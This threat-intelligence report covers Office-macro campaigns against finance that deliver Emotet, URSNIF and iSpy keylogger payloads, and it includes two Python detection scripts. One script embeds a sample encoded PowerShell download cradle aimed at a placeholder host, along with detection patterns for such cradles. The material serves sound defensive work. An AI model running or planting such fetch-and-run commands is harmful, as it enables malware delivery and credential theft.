Malscape Snapshot: Finance
Turning to the latest 100 threat reports that specifically target the finance industry, we can see that we have captured a Microsoft Office-based campaign. Microsoft Office file types make up 62% of the recent samples; the remaining 38% are Portable Executable files (see Figure 1).
Of these recent samples, 69% are Unclassified in terms of the specific type of malware detected. Unclassified here means that, at the time of submission to Lastline, the sample had already been submitted to VirusTotal but had no positive detection of maliciousness (see Figure 2). For Microsoft Office files the unclassified rate in this time frame is 99%.
Figure 1: The latest 100 threats seen in finance and their file type.
Figure 2: The latest 100 threats by the type of malware detected.
The Microsoft Office documents often share a common lure, an example of which is shown in Figure 3, and they exhibit a consistent set of behaviors, as shown in Figure 4. The documents use Windows scripting utilities such as PowerShell to download the final payload, which is typically a new variant of one of three families: a sophisticated keylogger, URSNIF or Emotet.
Figure 3: Example of a Microsoft Office lure.
Figure 4: Behaviors displayed by the malicious document.
The infection technique used by the malicious Office files can be seen in Figure 4. Once the user has enabled the content of the Office document, the macro spawns a command shell and PowerShell to fetch the main payload from an Internet address embedded in the document. Both main payloads are mature modular trojans whose operators keep adding functionality to their arsenal, and both go by a number of aliases: Emotet (aka Geodo, Feodo) and URSNIF (aka Gozi, ISFB, Goznym).
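The process chain described above (Office application spawns cmd.exe, which spawns PowerShell to fetch the payload) is what an endpoint detection should key on, since the lure documents themselves went undetected by VirusTotal. The following is an added example, not Lastline's code: it walks constructed Sysmon-style Event ID 1 (process creation) records, follows ParentProcessGuid links back through script hosts to the Office application that started the chain, and decodes a PowerShell -EncodedCommand argument so the download cradle hidden inside it can be inspected. The field names follow Sysmon, but the paths, GUIDs, PIDs and the URL are assumptions constructed for this demo.

```python
"""Detection for the Office -> cmd.exe -> PowerShell download-cradle chain.

Added example, not Lastline's code.  It walks constructed Sysmon-style
Event ID 1 (ProcessCreate) records; the field names follow Sysmon, but the
paths, GUIDs, PIDs and the URL are assumptions made up for this demo.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Download-cradle indicators (case-insensitive): .NET WebClient methods,
# Invoke-WebRequest and its alias, BITS, or a bare URL in the command line.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|https?://", re.I)
# -EncodedCommand and its short forms (PowerShell accepts any unique prefix).
ENC_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of a UTF-16LE string; return it decoded."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def office_ancestor(event, by_guid, max_depth=5):
    """Follow ParentProcessGuid links through script hosts (cmd.exe -> powershell.exe)
    and return the Office application that started the chain, or None."""
    cur = event
    for _ in range(max_depth):
        parent = by_guid.get(cur.get("ParentProcessGuid"))
        if parent is None:            # parent not logged (e.g. explorer.exe)
            return None
        name = basename(parent["Image"])
        if name in OFFICE_APPS:
            return name
        if name not in SCRIPT_HOSTS:  # chain passes through an unrelated process
            return None
        cur = parent
    return None


def detect(events):
    """Return one alert per script host whose ancestry leads back to an Office app."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["Image"])
        if name not in SCRIPT_HOSTS:
            continue
        office = office_ancestor(e, by_guid)
        if office is None:
            continue
        cmdline = e.get("CommandLine", "")
        decoded = decode_encoded_command(cmdline)
        # Inspect the decoded payload too: the cradle is usually hidden there.
        inspected = cmdline + ("\n" + decoded if decoded else "")
        alerts.append({
            "pid": e["ProcessId"], "image": name, "parent_office": office,
            "download_cradle": bool(CRADLE_RE.search(inspected)),
            "decoded": decoded,
        })
    return alerts


# Constructed sample: a macro in WINWORD runs cmd.exe, which runs an encoded
# PowerShell cradle; the last event is an unrelated, benign PowerShell run.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessGuid": "W", "ParentProcessGuid": "X", "ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"ProcessGuid": "C", "ParentProcessGuid": "W", "ProcessId": 4388,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc " + ENC},
    {"ProcessGuid": "P", "ParentProcessGuid": "C", "ProcessId": 4402,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + ENC},
    {"ProcessGuid": "Q", "ParentProcessGuid": "X", "ProcessId": 5010,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

Both cmd.exe and powershell.exe in the chain are reported, each attributed to WINWORD.EXE, while the benign PowerShell run started from explorer.exe is not; decoding the -EncodedCommand argument is what exposes the DownloadString call, since the raw command line shows only base64.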
It is not only the lure document that Emotet and URSNIF have in common. Emotet, first spotted in 2014, shares some of its functional design with URSNIF, which dates back to 2007. They also share an evasion module for detecting dynamic analysis environments, and common methods for infiltrating financial transactions, such as man-in-the-middle network sniffing and hijacking of automated transfer payments. Because both are modular, criminals have developed and added new features over time, including lateral movement, additional credential theft, and spam capabilities.
Trojan.filerepmalware and Suspicious Filerepmalware are iSpy Keyloggers
Figure 5: Behaviors displayed by trojan.filerepmalware.
By intercepting the sample's communication with its command-and-control server, we found an identifying signature of the iSpy Keylogger tool in the act of exfiltrating the victim's website, email and FTP credentials, along with license key information for installed products (see Figure 6).
Figure 6: Example of iSpy Keylogger stealing credentials.
Figure 7: Criminals, including HawkSpy, are using Twitter to promote the iSpy Keylogger.
The iSpy Keylogger (see Figure 7 for an example of how one particular criminal organization promotes it) is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim credentials via SMTP or FTP to a server under the keylogger operator's control. Samples analyzed by Lastline in this time frame sent victim credentials to an outsourcing organization based in India that holds ISO 27001:2013 certification. This might indicate that the operator is reusing an earlier victim: stolen credentials are used not only to infiltrate business transactions, but also to turn a prior victim's infrastructure into a drop server for data stolen from new victims.
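Because the drop server in this case sits on a legitimate third party's infrastructure, destination reputation will not catch the exfiltration; what stands out is which process is speaking SMTP or FTP. The following is an added example, not Lastline's code: it runs over constructed Sysmon-style Event ID 3 (network connection) records and flags outbound connections to mail and FTP ports from any image that is not an allowlisted mail or file-transfer client, matching on the full path so that a keylogger dropped into %TEMP% under a mail client's name does not pass. The allowlist paths, the process paths and the RFC 5737 test addresses are assumptions constructed for this demo.

```python
"""Flag outbound SMTP/FTP connections from processes that are not known mail
or file-transfer clients: the exfiltration path iSpy/HawkEye uses.

Added example, not Lastline's code.  It runs over constructed Sysmon-style
Event ID 3 (NetworkConnect) records; the allowlist paths, process paths and
the RFC 5737 test addresses are assumptions made up for this demo.
"""
from collections import defaultdict

EXFIL_PORTS = {21: "ftp", 25: "smtp", 465: "smtps", 587: "submission"}
# Allowlist by full lower-cased path, not basename: a keylogger dropped into
# %TEMP% as outlook.exe must not pass just because its name matches.
MAIL_CLIENTS = {
    r"c:\program files\microsoft office\root\office16\outlook.exe",
    r"c:\program files\mozilla thunderbird\thunderbird.exe",
    r"c:\program files\filezilla ftp client\filezilla.exe",
}
# Directories a standard user can write to; malware drops typically live here.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def is_exfil_candidate(event):
    """Outbound connection to a mail/FTP port from a non-allowlisted image."""
    if not event.get("Initiated", True):   # inbound: not this process exfiltrating
        return False
    if int(event["DestinationPort"]) not in EXFIL_PORTS:
        return False
    return event["Image"].lower() not in MAIL_CLIENTS


def detect_exfil(events):
    """Aggregate candidates per image: which services it spoke, to where, and
    whether it runs from a user-writable path.  Destination reputation is
    deliberately not consulted: the drop server can be a legitimate host."""
    seen = defaultdict(lambda: {"services": set(), "destinations": set()})
    for e in events:
        if not is_exfil_candidate(e):
            continue
        f = seen[e["Image"]]
        f["services"].add(EXFIL_PORTS[int(e["DestinationPort"])])
        f["destinations"].add(e["DestinationIp"])
    return {
        image: {
            "services": sorted(v["services"]),
            "destinations": sorted(v["destinations"]),
            "user_writable_path": any(d in image.lower() for d in USER_WRITABLE),
        }
        for image, v in seen.items()
    }


# Constructed sample events (RFC 5737 documentation addresses).
KEYLOGGER = r"C:\Users\alice\AppData\Roaming\WindowsUpdate\wupdate.exe"
FAKE_OUTLOOK = r"C:\Users\alice\AppData\Local\Temp\outlook.exe"
REAL_OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
SAMPLE_EVENTS = [
    {"Image": KEYLOGGER, "DestinationIp": "203.0.113.25",
     "DestinationPort": 587, "Initiated": True},
    {"Image": KEYLOGGER, "DestinationIp": "198.51.100.7",
     "DestinationPort": 21, "Initiated": True},
    {"Image": REAL_OUTLOOK, "DestinationIp": "203.0.113.40",
     "DestinationPort": 587, "Initiated": True},
    {"Image": FAKE_OUTLOOK, "DestinationIp": "203.0.113.25",
     "DestinationPort": 25, "Initiated": True},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "192.0.2.80", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",          # inbound SMTP
     "DestinationIp": "192.0.2.9", "DestinationPort": 25, "Initiated": False},
]

if __name__ == "__main__":
    for image, finding in detect_exfil(SAMPLE_EVENTS).items():
        print(image, finding)
```

Only the dropped keylogger and the impostor outlook.exe are reported; the genuine Outlook install, the browser's HTTPS traffic and the inbound SMTP connection are not. In production the allowlist would be built from the organization's software inventory rather than hard-coded.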
The threats described in this snapshot are the result of our analysis of all threats targeting finance departments and the financial industry over the past 30 days, plus the 100 latest malware samples submitted by Lastline customers in the financial vertical. The trends differ significantly from the global average, probably because of the (appropriately) heightened security controls in finance. Those controls have raised the bar for a cyberthreat to successfully infect a device on an internal finance network. The sophistication of the attacks we analyzed in these latest 100 threats, fast-evolving email campaigns that avoided detection and professionally developed modular payloads with advanced evasion techniques, shows that criminals have responded in kind against a well-prepared finance industry.
To read about the global trends against which we compared our findings in Finance in this snapshot, please download our Q4 2017 Malscape Monitor Report.